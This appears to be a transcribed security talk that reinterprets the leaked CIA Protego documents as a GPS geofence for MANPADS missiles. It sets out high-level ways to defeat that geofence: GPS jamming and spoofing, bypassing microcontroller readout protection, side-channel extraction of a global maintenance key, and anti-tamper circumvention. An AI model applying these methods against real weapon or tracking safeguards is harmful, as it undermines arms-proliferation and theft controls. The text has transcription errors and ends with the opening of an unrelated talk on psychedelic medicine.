So, our next speaker is Joe Sweatzels. He will help a hella talk on Harry Potter and the not so smart proxy war, taking a look at a covered CIA virtual fencing solution. Enjoy the talk and give a huge round of applause for Joe. Joe. Sorry. All right. Hello and welcome everyone to my talk, Harry Potter and the not so smart proxy war. My name is Joe Sweatzels and I'm a security researcher with Midnight Blue. I primarily focus on embedded systems, mainly in industrial control systems, automotive and IoT. And I previously worked on the protection of critical infrastructure at the University of Twentyn in the Netherlands. So what triggered this talk? The Vault 7 release of documents. How many people here are familiar with the Vault 7 documents? All right. That's quite a lot. So this concerned almost 9,000 documents belonging to the CIA's Center for Cyber Intelligence, mainly dated between 2013 and 2016. And most of them concerned exploits, implants and TTPs for various kinds of targets. Now most of these entries got in-depth coverage by the security community and the press, all except for one, which is the Protego system. So how many people here are familiar with the Protego documents? Yeah, that's almost nobody. And that's kind of the point. So during the release, WikiLeaks claimed that Protego was a suspected assassination module for GPS-guided missile systems, for example, in drones used for assassination, and that it was installed on Pratt & Whitney aircraft. Now this release consisted of four secret documents and 37 related proprietary manuals. The project seems to have been maintained between 2014 and 2015. And what's interesting about them is that they're very different from the other projects in the Vault 7 release. There's no clear indication why these documents were in this particular release. Now when I looked through these documents, something felt off to me. The claim that WikiLeaks put forward did not seem to hold when you look at the documents. Now this is the architecture at a very high level of this Protego system. So on the top you have the actual Protego subsystem, which consists of a master processor, something they call the tube smart switch, and something they call the missile smart switch, and this communicates over RS422 with a programming box consisting of two other microcontrollers. And one of the interesting things that you can immediately see is that there is interaction with a GPS beacon interface. So far so good, right? All the missile systems terminology is there. There's talk of the missiles, there's talk of the tube from which the missile launches, and there's talk of the color that holds it into place. But number one, this PWA term. So this assertion by WikiLeaks that it was installed on Pratt and Whitney aircraft seems solely based on the PWA abbreviation in some of these documents. Now the problem with this is that Pratt and Whitney manufacture engines. They do not manufacture aircraft. And it doesn't really make sense for these microcontrollers that are part of Protego to reside on the engine. So I was thinking, what could this PWA stand for? And I think a much more likely explanation is that it stands for printed wiring assembly, which is essentially a PCB after all the components are attached. That seems to me like a more sensible explanation for this term. And then there's the second kind of complication, which is also a giveaway for what I think that Pratt goes actually about. There's mention of a suitcase, there's mention of a BCU and a grip stock. 
So how many people are familiar with the terminology of BCU and grip stock? Right, that's not a lot of people. Now this is not typical air to surface or air to air missile terminology. So I have an alternative hypothesis. And that's that Protego is a man-pad smart arms control solution. So for those who don't know, man-pads like Stinger missiles are shoulder portable systems that can be used to take down various advanced aircrafts. And this is essentially how they work. Like at the base, they have a launch tube. And the missiles are typically delivered in a discarbon launch tube, which after the launch you throw away. And that includes the side assembly. And these tubes can be reused, but that's usually done at the depot, not on the battlefield. And they're transported in a dedicated case, which seems to match this suitcase terminology that we saw earlier. And then the missiles themselves look roughly something like this. So at the front you have a seeker head, which typically works by infrared. And that allows for passive homing. It takes an IR signature of the target and then locks onto it. And then you have the guidance and control steer section, which essentially steers the missile during its flight towards the target. And then you have a warhead, which is the thing that goes boom. And then you have this grip stock terminology that we saw. So in manpads, you get the missile, which is a one-time use thing, typically. But the grip stock is something that is reusable between missiles. And that is detachable. It contains the trigger, which you use to fire the missile. And it contains the targeting electronics. So they essentially get the signal from the seeker head. It's rerouted to the targeting electronics in the grip stock and then makes all the kind of complicated calculations and sends that data back to the missile before firing it. And this is also where you insert the BCU, which is the terminology that we saw earlier, which is a term that stands for battery coolant unit. So it's a canister filled with something like liquid argon, which shoots jet into the system for both power and cooling purposes. And the launch procedure looks something like this, like in a picture on the right. You attach the grip stock and maybe an identify friend or foe system to the launch tube. Use the site to track the aircraft. Then you get audio feedback from the identify friend or foe to see if maybe it's a friendly aircraft and you don't want to fire on it. Then if you've decided that the aircraft should be taken down, you insert the BCU and you get audio feedback from the grip stock as soon as you have a target lock on and you pull the trigger. And that's essentially very roughly how these kind of systems work. And I think this matches the kind of terminology in the Protego documents much better than a system that's installed on drones. Now the core of what Protego does, you can see on the left here. It essentially limits the operational conditions for ensuring system operationability to a conjunction between the three situations that we see on the left. It needs to be within border. The GPS signal needs to be valid. And the operational period must not have expired. So what this essentially is, is a geofencing solution. So people who are not familiar with geofencing, that's essentially any kind of system that restricts the usage of a particular system to a particular time and a particular place. Why would the CIA want something like this? 
And I must add that this is obviously speculation based on very few documents, but I do think it is a more plausible hypothesis than the one that is currently out there. Well, if you've been following the news a little bit, especially around the terrible Syrian situation, after the situation deteriorated, many of the rebels started facing serious air power, both by the Syrian army as well as by Russian allies. Because the US has a vested interest in opposing the Assad regime and the Russians have a vested interest in supporting it, a situation emerged where voices started calling for maybe supplying these rebel forces with manpads to counter this kind of air power. Now this does come with some problems, especially if you're aware of the history of supplying manpads to what I'd like to call less than trusted third parties. Man on the right went on to become very famous. So during the end of the Cold War, the Americans, they sent stinger missiles to the Mujahideen in Afghanistan to counter Soviet air power that did end up working. But the problem is that you then had the proliferation of this kind of powerful technology among parties that went on to be not exactly allies. So people started talking about maybe implementing technical use controls in these kind of systems, using GPS for example, to limit the use of these stinger missiles to a particular time and place to counter proliferation. I think the most sensible candidate for something like this to have been developed is what came to be known as the Timber-Sikamur program. So Timber-Sikamur was a CIA program to supply Syrian rebels with weapons and training from 2012 to 2017. Basically in all the official communication that followed after its disclosure, manpads were barred from the program, but there have been sources that claim that small batches of manpads have made it to rebel hands in Syria. Now I have to say it is unclear to me whether Protego was a part of this program, whether it was even fielded, maybe it was just developed and never actually fielded, but I do think this is a very good candidate for the kind of technology that you can see on those documents. So what is the Harry Potter connection? Well it is mainly in the name, and the name is another giveaway for the functionality of the system. So within these documents two names come forward from Harry Potter, the Devil Snare name and Protego, and essentially Protego is a charm that protects the caster with a shield spell and the Devil Snare is a magical plant that constrains someone to a certain position, you know, nice metaphor for a geofence. So let's take a look at a little bit of technical analysis to delve into that. This is the actual block diagram from the documents, so if anyone with clearance is in the room, sorry. There's three main microcontrollers there, the main processor on the left, the tube smart switch in the middle, and the missile smart switch on the right, which are all PIC 16 bit microcontrollers. I put some additional terms on there like AT, which stands for anti-temper, IB, which stands for in-border, EOM, which stands for end of mission, and then there's talk of the sigma dot, which is missiles terminology for a tracking signal. Now this is the heart of the smart fence and how it works. So the way these manpads work is that the missile after the seeker has found a potential target, sends the sigma dot signal over a wire to the grip stock, where the actual calculations need to be done by the targeting electronics. 
So what the smart fence mechanism does is it ensures that this switch is default open, so no signal goes from the missile seeker to the grip stock unless certain conditions are met. And that's the whole core of the system. It closes only after these conditions have been met and otherwise not. So how does that work? Now you can see this on this sequence chart. After the conditions have been met, after the BCU has been inserted, it sends an encrypted signal to the tube smart switch to say set audio switch on, which is terminology for close the smart switch, and it then forwards it to the missile smart switch, which ensures operationability. And the protection of the system relies on the fact that these channels for these communications, which is an internal serial bus, are encrypted and as such require the presence of keys, which is why they included key eraser functionality. So when do these keys get erased? After you enter the border once, so you go to the target where you want to deploy your system and you enter this geo fence border, then the keys get erased if you detect an anti-tempering event, you detect low batteries, or if you go out of the border or the mission ends. And then the main processor key as well as the tube smart switch keys are both erased. They're also erased if a missing missile is detected, so if you remove the missile from the tube. So these are the status indication LEDs, and I think these would be mounted on the suitcase and they indicate the status in which the missile is in. Why is this probably there? Because operators need to know the system is good to go before running up to an aircraft and then figuring out, oh, it doesn't work too bad. This is the message format. It's not terribly important, but this is sent over the serial buses. The inner core of the message, which is 1 to 8 bits, is encrypted. Unencrypted messages are allowed, but only for one message type, and that's the case if the nonce is set to zero. So these are the messages that are sent between this programming box and the Prutigo subsystem, and the only interesting ones, in my opinion, are the ones that allow you to reprogram the main processor or change the beacon state configuration or enter tactical mode. And these are the messages that are sent internally between the microcontrollers, closing the audio relay, detecting anti-tamp ring, missile missing, that kind of stuff. So let's do a brief security analysis, and I have to say that this is, again, hypothetical because the CAA did not provide me with any missiles, so I'm going to be talking at a very high level, but this is the general attack plan that I would imagine people attacking these kind of systems going through. Actually this is what the Prutigo life cycle looks like. So you start by programming the device with key material, which is loaded into the firmware images, you switch it to storage mode, then you ship it to a covert facility in or near the theater of operations. The programming box, which I imagine to be handled by a CAA officer, is then used to configure the G on the time fans, which is requested by this less than trusted third party. It enables tactical mode, you hand it over to these guys, and then if it is stolen, it's rendered inoperable outside of the fence conditions, or if the mission period expires without use, you return it to the facility and you can set it again for another go. And this is the cryptographic architecture underpinning it, and you can really make up a lot of this out of the documents. 
So the keys are generated using a key gen application, they're written into the firmware images. The programming box itself does not contain any keys, maybe it queries them from some kind of back end, maybe they're entered using some kind of a key loading device, it's unclear to me. The keys that are loaded into the Prutigo system consist of a one single 128-bit key, which is shared between all the microcontrollers on this manpets. The missile smart switch key never actually does get erased. And interestingly, there is one maintenance key. So they mentioned that there is a maintenance key that's embedded in the firmware images, which is identical for all the Prutigo instances. So not just one manpets, but all the missiles. Why is this the case? Well, I think that if you have an event which erases the keys, for example, the expiry of the mission period, then you still need to be able to reconfigure a new mission period. And if there's no keys, you cannot communicate over this programming interface. So there's probably a maintenance key that exists as a fallback, that if the actual mission key is no longer there, you can still reconfigure this new situation. But from a security point of view, having a global maintenance key among all these manpets is not a good idea, in my opinion. So what does the attack surface look like? It looks like something like this. You might go for attacking the GPS. You might go for physical tampering. You might try to extract or modify the keys or the system logic. So if we were to go for physical tampering, these would be the most likely candidates, in my opinion. You might try to mess with the beacon interface signals, or try to cause a default true evaluation regarding of the actual fence conditions. Or you might try to target with the smart switch itself by ensuring that it's normally closed, regardless of the fence conditions. Now in these kind of systems, there's bound to be anti-temper measures, obviously. So these might consist of things like metal shielding, or they might consist of encapsulation into coatings that are resistant to tampering or might cause damage to the components. You should try to remove it. There might be light sensors. So as soon as you open up the device, it triggers an anti-tempering event, or as soon as you apply a certain kind of pressure to the PCB, it might ensure that the keys are erased, and there might be active meshes there, which is essentially a grid of very thin wires that as soon as you break them or you short them, cause an anti-tempering event. And these might exist at an IC level, but they might also exist at an enclosure level, or they might be woven through the encapsulation to make things even worse. Now there's many well-explored invasion techniques, also via the IC back side, which I will not explore in this talk, but I think one of the most interesting things here is that the keys are stored in flash and not in battery-backed SRAM. And that's interesting because if an attacker can bypass enough anti-tempering measures to be able to cut the right enable line to the flash, they might at a later point be able to prevent erasure if the keys are stored there. The issue for an attacker here is that these kind of methods are quite knowledge and capital intensive, and you're also working on a system with an active warhead in there, so that's probably nerve-wracking. 
The bigger issue in my opinion is that these secret signals might be unencrypted, and if they're unencrypted, that would mean that even if I open up the device and I ensure that the smart switch is default closed and the keys are erased, then it might be possible for the secret to still get a lock on and get the firing signal from the grip stock. So I'm not sure if this is the case, but if they are unencrypted, that would not be very good. So I'm not sure how hard tampering with that switch is. It's just speculation, but there's nothing indicating that these signals are encrypted as well. Then there's the route of going logical tampering. So we want to bypass the fence, and in this rough attack tree, you can see that we can either try to change the fence parameters, we can try to reprogram the main processor firmware, or we can try to attack the GPS. So let's try to explore what's involved here. Now in both cases, we will need to first understand the protocol, because, well, we understand it from the leak documents, but in an ideal situation an attacker would not. So we would have to reverse engineer the firmware, which we would have to be able to extract, either from the Prutigo system itself or maybe from the programming box, but that's not very likely because then we would have to steal it from a CA officer. The same goes for obtaining the keys, which you would either have to extract from the microcontrollers or, again, the programming box. Now I think that the conclusion here is that most of these approaches will likely require you to sacrifice at least one manpads for research and then try to generalize it to other manpads that might be in your possession. So when trying to extract or modify the keys and firmware, there's four main approaches. You can go for the debugging interfaces, you can go for side channel analysis, you can go for invasive attacks, or you can go for exploiting software bugs. Now some of these approaches might trigger anti-tempering measures, but the maintenance key never gets erased, and it's global, so if I'm capable of extracting this, that's a very interesting route to go down. These are the debugging interfaces for the microcontrollers that are used in Prutigo. The PIXIS 16-bit, which uses in-circuit serial programming, and you can use that to read or write to internal memory. Now there is an issue, Microchip does have Code Guard, which is its own readout and write protection. It is configured via fuses in the microcontroller, and a violation of its policies will trigger a security reset. And it offers three levels of segmentation. You have the boot segment, where you have your secure bootloader, then you have the secure segment, where you can put secure ISRs or small lookup tables or something like that, and then you have the general segment for all the rest. The privileges go from high to low there. Now this is the memory layout of the Prutigo microcontrollers. You have the firmware in the executable flash, and that's essentially checked with a version number and a 16-bit CRC during startup. After that you have the key and the key number, which is also checked with a checksum, which is also CRC. And what's really interesting to me is that there's no mention of firmware authentication whatsoever here. There's no mention of a hardware root of trust or a secure element. There's really nothing beyond Code Guard. That's the core protection here. 
An interesting disclaimer from Microchip is that regarding Code Guard, there are dishonest and possibly illegal methods used to breach the code protection feature. Imagine that. All of these methods, to our knowledge, require using the Microchip products in a manner outside the operating specifications contained in Microchip's data sheets. Most likely the person doing so is engaged in the theft of intellectual property. Well, that's very confidence inspiring. So the microcontrollers that are used in Prutigo only offer Code Guard basic, which only supports a single general segment for read and write protection. So there's no separate segment for bootloaders or keys or whatsoever. I didn't delve into Code Guard security in depth for the newer microcontrollers of PIC because I didn't have the time for that. But interestingly, older families' code protection suffered from what they called the Heart of Darkness attack. What you basically did here is that you could erase the memory on a per block basis and that would reset the security settings only for that block. So for the first block, the boot block, you would override it with a dumper and upon execution that would dump the rest of the microcontroller memory and then you would at a later stage override one of the other blocks in another known good and then dump the boot block that way and you would be able to extract it. I'm not sure if that applies to these microcontrollers as well, but might be an interesting avenue of approach. Another way to try and obtain the keys would be using side channel attacks. I'm not going very in depth here. I'm assuming people are familiar with simple differential and correlation power analysis. Interestingly for the PIC microcontrollers, the ones that they chose here is there's no hardware crypto and there's no hardware-based side channel countermeasures there. There's probably in my opinion also no software countermeasures like blinding and masking or anything like that because they might affect power consumption in an adverse manner. That's an issue for Protego because there are extreme power constraints here because you only draw power from the BCU or a battery that is in the Gripstock. In this case, you would target the maintenance key, extract it and then apply it again to a different man-pads. Invasive attacks would be another route. The PIC microcontroller families, I believe 12 and 18 suffered from an attack where if you de-capped them down to the dye level and you shown UV light on the floating gate, you would be able to reset the security fuses and quite reliably because the fuses were quite far away from the rest of internal memory. This apparently applies as well to the PIC 24s. I've never seen a public write-up but when Googling this, there was a Chinese company offering the capability to bypass readout protection on these microcontrollers. I believe that that would probably be an approach like this. If that applies, that's quite serious. Then there's the route of software vulnerabilities that would be using a memory corruption bug or a state machine logic bug in order to either exfiltrate the cryptographic keys or maybe try to send a close message while it should not be sent. There's very little to say about how applicable this is but there are software change requests with leak documents and they mention things like when BCU power is applied and the missing missile is active, the erase does not occur. 
They caught stuff like this but if bugs like that slipped into production, attackers might be able to exploit it. I don't think this is a very viable approach for the kind of attackers that would be going after this because the attack surface that is exposed on a software level is very minimal and doing any kind of full black box vulnerability research or exploit development here is hellish so you would need to be able to extract the firmware anyway. I don't think this is a very viable route. What's more viable in my opinion is attacking GPS because the core security decision of Pratigo is based on GPS derived info, location and time. For those unfamiliar with GPS, GPS is part of a set of systems known as GNSS, global navigation satellite system, Russian GLONASS, the European Galileo and the Chinese Baidu. Pratigo in my opinion probably uses the plain core acquisition codes because in GPS you have five bands and the L1 and L2 band consist of a core acquisition civilian code and an encrypted precision code for military systems. I don't think Pratigo uses that because that would mean that the system needs access to these military cryptographic keys and you don't want that in a system like this because it needs to be handed out to a less than trusted third party and it also does not aid plausible deniability. So that means it uses plain signals. Threat number one here would be GPS jamming because if the GPS is unavailable, maybe key erasure does not occur or even worse for the people using these missiles, if the GPS is unavailable, the manpets won't fire, which is quite interesting for opposing air forces here. Now a naive approach would be to use just overpowering noise on the L1 and the L2 bands, but this might be detected through signal anomalies or it might be corrected for. For example, through using multi-source correlation from different GNSS systems, using noise filtering, stuff like that, and that might trigger key erasure. So instead you might want to go for a smart GPS jamming approach where you combine your jammer with info from the GNSS system and then you trigger short and spart bursts which are aligned with specific portions of the message, such as the preamble, the time mark or the CRC, and that's far harder to detect. Another approach to attacking GPS would be using spoofing because GPS is an unauthenticated and weak signal which allows for replay or forging and that's become much easier over the years through commercial and SDR solutions. So you would collect an infant signal, move the manpets to a faraday cage and then continue replaying it in a loop. Now again there could be countermeasures here such as detecting anomalies in signal strength, latency, loss of lock, using multi-source correlation or using an internal reference clock to detect jumps in time. I do think there is an issue with implementing stuff like this in Protego because active countermeasures would again drain power here. So an attacker that would try to bypass stuff like this would try to use a carry-off attack where you try to carefully align the spoofed signal and gradually increase the power over time to take over the signal without causing a loss of lock or triggering these countermeasures. So it's not unovercomable. Conclusion. This does not only apply to Protego. Everything I said is essentially embedded system security 101. This applies to all kinds of geofencing solutions like theft prevention in armored trucks, ankle monitors, UAV area denial and livestock management. 
So you might in the future see cyberpunk cattle rustlers using technology like this. Is any of this stuff a tech in practice? Well yes, especially through GPS jamming because it's very accessible. You don't need a lot of technological knowledge. You spend 10 bucks on AliExpress and you buy a jammer and then you use it, for example, as a car thief or a cargo thief, which does happen. In conclusion, Protego, I don't think it is a GPS guided aircraft assassination module. I think it is a manpads geofencing solution for a covert arm supply program. It's unclear to me where, when or if it was ever fielded. Timber Sycamore would have been a good candidate. And interestingly, it utilizes commercial off the shelf technology in a similar fashion to commercial systems. A geofence is a geofence. Impossible Achilles heels here would be the unencrypted secret signals, a lack of secure boot and firmer authentication, the existence of a global maintenance key, and its reliance on civilian GPS without any clear electronic warfare countermeasures. And that's it. If you have any questions, you can ask them now or ask them over Twitter. Thank you very much. You all know the procedure. We have eight microphones in the room, so please line up behind the microphone. Or also you can ask questions on the internet and our awesome signal angels will relay the questions into the hall. Right now we have one question at microphone number four. Please go ahead. Hi. Thank you for your talk. When the device uses the military version of GPS, is GPS spoofing then still possible? I'm not sure about it because I haven't looked really into the details of like the precision codes. I have read articles that it would still be possible in some scenarios because of the way key management happens there, but I can't really answer that question in detail because I haven't really investigated that. All right. We have another question at microphone number two over there. Please. Hi. Thank you for the presentation. I was wondering, you talked about GPS spoofing to keep the system working. It seems like there's a very practical attack where you could disable the man pads by spoofing GPS and pretending to be outside the fence when it's actually still inside. Yeah. I think like if the attacker model is not a less than trusted third party trying to take these man pads and use them against civilian airliners, but instead from the perspective of the man pads user, the adversary would be a opposing air force, then using simple GPS jamming would be sufficient to ensure that these cannot fire, which in my opinion is a little bit iffy because GPS jamming is not that hard. All right. Another question at microphone number four. Go ahead, please. Yeah. Thank you very much. I actually have two questions. So first is like, okay, well, you found the documents, so actually what motivated you to do all of this research? You know, like it's a lot of work, like the documents which you found, analysis which you've done, and you are a very busy person. So it's a lot of work. That's question number one. And question number two is all of these designs which you've been showing like key management, security decisions, design of this like of the electronics, how does it compares to you to all the industrial equipment you looked at? Did you see what is more smarter, more intelligence, more, is it better than in the industry or not? 
So with regards to the first question, it's I think curiosity and using the little spare time you have to somehow still sit behind a PC. That's the main answer to be honest. And the second answer is, well, I can't really say a lot about how it compares because there is a degree of speculation in this research. Like I have looked at the documents and I can extrapolate from the security features that I know the microcontrollers to have and stuff like that. So it's hard to compare definitively, but it would say that the interesting thing is that the microcontrollers used are not secure microcontrollers. They do not have a secure element. They are not intended for high security purposes. And I'm not sure why they chose these. Maybe it's because this was only during a development phase. Maybe it was because of the power consumption constraints, but it would not be my first choice. I would say, yeah, it compares badly in a sense. All right, we have a question from the internet. Go ahead, signal Angel. Do the rebels in these conflicts have reasonable access to the resources needed to crack the system? I'm sorry, I didn't quite get that. Would the less trusted parties have resources to crack something like this? Well, they would have now. I think that's the problem. To be honest, these less than trusted third parties, these are not stupid people. I don't think these are people who have the kind of resources for doing really invasive attacks with focused IM beams and God knows what. But GPS spoofing and GPS jamming are not complicated attacks. They're relatively easy to figure out. And as soon as you know this is a system that works on the basis of GPS, which is not hard to figure out, you can try to develop an attack like that. So I think even without these leaks, fielding a system like this is, I don't think a very good solution to that proliferation question. So I think getting around this kind of stuff, if it works, like the documents seem to hint that it works, yeah, they could probably get around it. All right, signal Angel, do you have anything else from the internet? Nope. Okay, then thank you very much for this great talk. Thank you.
In this talk we will take a look at the 'Vault 7' Protego documents, which have received very little attention so far, and challenge the assertion that Protego was a 'suspected assassination module for [a] GPS guided missile system ... used on-board Pratt & Whitney aircraft' based on system block diagrams, build instructions and a few interesting news items. In addition, we will discuss hypothetical weaknesses in systems like it. In March 2017, WikiLeaks published the 'Vault 7' series of documents detailing 'cyber' activities and capabilities of the United States' Central Intelligence Agency (CIA). Among a wide variety of implant & exploit frameworks the final documents released as part of the dump, related to a project code-named 'Protego', stood out as unusual due to describing a piece of missile control technology rather than CNO capabilities. As a result, these documents have received comparatively little attention from the media and security researchers. While initially described by WikiLeaks as a 'suspected assassination module for [a] GPS guided missile system ... used on-board Pratt & Whitney aircraft', a closer look at the documents sheds significant doubt on that assertion. Instead, it seems more likely that Protego was part of an arms control solution used in covert CIA supply programs delivering various kinds of weapons to proxy forces while attempting to counteract undesired proliferation. In this talk we will take a look at the Protego documents and show how we can piece quite a bit of information together from a handful of block diagrams, some build instructions and a few news articles. Finally, we will discuss the potential weaknesses of such 'lockdown' systems which have been proposed for and are deployed in everything from theft prevention solutions and livestock management to firearms control and consumer UAVs.
10.5446/53189 (DOI)
Let's come to the talk. So next up is Andrea Jungabeler. She is talking about drugs and how drugs affect the psychiatry, or this hard word. Why don't you do it? I know now. And the question is after the... What is for board in English? Prohibition. Ah, prohibition. Right. After the prohibition in the 70s, not much thinking about how these drugs work and how could they improve psychiatry has been done. So now everybody is asking, is this the magic bullet cure? I don't believe so, but more about this by Andrea. One welcome please. Hello everybody. I'm very happy to be here and able to talk to you on a topic that is very important to me and I think very important to many people now and in the future. So the topic today is psychedelic medicine, hacking psychiatry. And just to give away the punchline, it's not a magic bullet and it will never be. But on the other hand, there are lots of things to know and think about in this context that I would like to introduce you to. But first a few words about myself. I'm a medical doctor, specialized in emergency medicine intensive care. I work and live in Berlin. And I'm also one of the founders of Mind, the European Foundation for Psychedelic Science and its current medical director. One more sentence about us. That's our core team. And also Mind is a members-based psychedelic science association. We have around 450 members worldwide and a core team of about 50 people. That is a nucleus of paid staff, lots of very dedicated, very good volunteers and great interns from different disciplines like the neurosciences, psychiatry, psychology and pharmacology for example. So we work to establish psychedelic science as an evidence-based method and also educate about it in Germany and Europe around it. Okay, but let's dive in at the deep end. Psychedelics. What are psychedelics? Well, the term comes from the Greek, psychedelos, which could be translated as manifesting the mind of the psyche. So mainly we're talking about psychoactive substances with a certain capability of transforming one's perception, introspection, sensory qualities in a very typical way that is sometimes described as dreamlike, but not necessarily so. The classic psychedelics that are also called hallucinogens, which I don't like as a term because they don't induce hallucinations. What they do is induce pseudo-halosination. So somebody on a psychedelic substance usually in 99% of the time is aware that they have taken a substance and what they're experiencing is due to the substance. So it's not a hallucinogen but a pseudo-halosinogen. But these substances like the classics LSD, psilocybin or DMT function in a very specific way and they all are working on the certain allergic system. So serotonin is one of the key neurotransmitters and there's one receptor, which is the 5H2-2A receptor, which is like the smallest common denominator of all those substances, which doesn't say that they all work just on this one, but they affect a whole plethora of neurotransmitters and receptors, but this is the key where they all work. There are other substances that are classified as somehow psychedelic like the intactogens, exosy-MDMA is one of the kind which works also on the serotonin system, the so-cities like ketamine who work more on the NMDA receptor, and some others that are just basically chemically random like aminita, which is fly agaric mushroom, auditora, or salvia. 
Okay, this is the only slide I'm going to bother you with this dry kind of science, but I think it's important to be clear about this because even though psychedelics are a pop-cultural meme, hardly anybody knows anything about it to be honest. Most people associate them with being drugs of the same danger profile as methamphetamine or opioids think there is an addiction factor which in fact does not exist with classic psychedelics. And basically it has been the dirty corner of perception for many people for a very long time. Recently things have changed a bit. Psychedelics have come mainstream, firstly because there is a perceptions shift on drugs in general due to the cannabis, perception and medication changing, and also because people like for example Michael Pollan who is a classic mainstream author writing on cooking and nutrition have turned to writing about psychedelics. And another factor that has helped psychedelics in one way and harmed them in another is the whole microdust dose in craze we have seen, especially in the tech and developmental scenes and especially in the Bay Area and Silicon Valley. Okay, but where do they come from? In this talk I am not going to speak about psychedelic psychoactive substances in other cultural frameworks. There are cultures like in the Amazonian basin or some Mazatec people in Mexico who have been using psychoactive substances, psychedelics in a very ritualized sense for millennia perhaps, at least centuries. But this is not us. So let's talk about what happened here in Europe or in the western world including America. This guy up here, sorry, that's the wrong one. The pointer isn't strong enough, we worked like this. This nice guy up here is Albert Hofmann. In 1938 he was developing several substances that were supposed to work on atonia in postpartum women but also on other problems like blood pressure and he among other things developed the thing that later became LSD. But back then he didn't see any sense in pursuing it medically because it didn't work the way he wanted it to and he shelved it. And for some reason in 1943 he took it out of the shelf again to retest it for other purposes and accidentally gave himself the first noted LSD trip. This happened not because it was a shittie chemist but because the amount that is needed to induce an effect is so low as it has never been noted before in any other substance. So 20 micrograms of LSD can already produce a notable change in perception. So when he came out of that experience, this first one he had after accidentally dosing himself, he decided to go for a trial on himself. And trying to be safe, he used what he thought was a very low dose of the substance he discovered which turned out to be 250 micrograms of LSD which was his... I hear the laughter, you know, it's rather a high dose trip especially for somebody who just didn't know what was expecting him out there in his own mind. And this is the famous bicycle day trip where he rode home on his bike thinking that the world was collapsing around him basically. So even this wasn't a nice trip, the first one. What happened next was that he reported to his superiors as Zandu chemical in Basel and they had the idea of turning this into a substance for mainly doctors, psychiatrists, psychologists to experience what it would be like to be psychotic. So its first application of LSD was as a psychotomimetic. 
And as a psychotomimetic, thousands of dosages were distributed worldwide from the Czech Republic to Harvard University to everywhere and doctors tried it out. What happened then was that a small group of young, ambitious psychologists around Timothy Leary tried it out too and thought this is not just something for doctors, this is not just a psychotomimetic and brought it out basically into the real world and people were experimenting with LSD quite a bit in the 60s before it was forbidden in 71. Not because it turned out to be so dangerous. There were not so many accidents, not so many people had dire side effects, but because the political will to cope with this substance and its implications wasn't existing in the Nixon era. So 71 underground it goes into subculture. But the ginny was out of the bottle. It was not going to go back in and psychedelics, not only LSD but also well, Cytocybin later on MDMA and these days more than 500 new psychoactive substances that have been brought up on the black market are around us and people use them. It's a societal reality that our juridical system doesn't keep up with to be fair. So it's been in many subculture settings from people just going dancing and having a good time to self exploration to pseudo shamanic or shamanic settings. And I think most people will at least know somebody who has experienced like at least once. And then something else changed. A few years ago, let's say 10-ish, 10 years ago, psychedelics started coming back. There had been research, for example, at the University of Zurich around psychedelics before that already. There had been trials before. And the big comeback of substances like Cytocybin, LSD and MDMA as tools to augment psychotherapy was within the last 10 or 15 years. So these people up here are some of the people worldwide working with these substances trying to develop them into medications. So not over the counter, but prescription medications to be applied within the setting of psychotherapy. So the idea is never that somebody can walk into a pharmacy saying, oh, I'm depressed. I want to buy Cytocybin to treat myself, but to have a structured therapeutic session in which the effects can be contained and the benefits enhanced. So the ones that are most promising these days are Cytocybin for depression, which is already heading for the third stage, third and final stage of improvement as a medication within the USA and consecutively, hopefully in Europe. And MDMA is what people wanted to find if they buy ecstasy, not that they always get it, but MDMA is the substance they're trying to get for post-traumatic stress disorder. So in the US, even the Veterans Association has jumped on the bandwagon and has spawned this research, which is interesting at least. But isn't that harmful? Oh, these substances are very dangerous. Well, not in the way you think and not as much as you might think. This graphic up here is something that was put together by a group of 40 experts who discussed what substances have what harm on the user and what harm on the people around the user. So for example, alcohol is harmful for the person, giving them liver disorder, making them addicted and so on and so on. But also because people get aggressive when they use it or drive dangerously, for example, when they're intoxicated, it's dangerous to others. If you check out, I have to walk over here now, sorry to the camera people. The substance we're talking about for treatment are not up there with the very dangerous ones. 
We have the shrooms down here, the LSD is there, ecstasy is there. So very low danger to the user and almost no danger to other people. If you compare that to alcohol, heroin, tobacco, it's all up there. And to be quite fair, we are all part of a giant field study anyway. Because these substances are being used. This is dated from the 2017 Global Drug Survey, which is a self-reporting study where people talk about their own drug use and fill in forms online. This is not a statistically sound sample of the general population because to fill out that trial, you have to have a certain interest. But the people that have filled this out, we're talking about a number of over 115,000 worldwide say that they have in their lifetime partially used LSD. Where the number is, MDMA mushrooms in LSD, so MDMA 35% mushrooms, almost 25% LSD over 22%. And if you look around you, of how many people do you know who ended up in an emergency department or in a psychiatric ward due to only using those substances. Actually, looking at this giant field study that the legal market has provided us with, it seems to be rather safe. Because these people are not using clear dosages of a clean substance and still there's hardly anything happening. Okay, but what about micro dosing? Well, we don't know much about micro dosing in fact. There are no scientifically randomized controlled studies as to yet. The first ones are just starting. There are self reporting studies where people have filled out online forms. And it seems to be that what people are on one hand trying to achieve is yes, enhancing creativity, getting better work performance. But a lot of them are trying to treat, cure, enhance their latent or apparent depression. And the other thing is micro dosing, which is defined mostly as using a very low, almost subliminal dose of a psychoactive substance such as LSD, is being done by people with all sorts. There are people micro dosing MDMA and ibogaine, which is, if you look at the receptor profile, it's just insane basically. And frankly, can't do what they hope it does. And when we look at people who micro dose, we can't say how much of the effect they're feeling is really from micro dosing that substance. Or if we have a top notch first grade placebo effect going on where people feel much better because they have taken this and believe in it. Let's not turn down placebo. Placebo is extremely valuable medically. It's actually shown that placebo effects, for example, enhance the endogenous opioid production. So your body revs up towards healing, towards feeling better with the placebo effect, but this could also be done with a sugar pill. And there's one thing I just want to leave with you in this group. If anybody of you is micro dosing and has pre-existing heart condition, don't. Simply because some of the sub receptors, especially with LSD that are being activated in prolonged micro dosing for a long time, can be cardio toxic and possibly harm your heart. Just again, there's no clear data about this yet. Just to leave it with you if you suffer from a heart condition. Don't. Depression. That keyword I had with the micro dosing again as well. But let's go deeper into this. Because if we want to talk about how psychedelic medicine can really make a difference in psychiatry, depression is the first line thing to think and talk about. And why is that? Depression is a very serious psychiatric disorder. People who are severely depressed, and that's many people. 
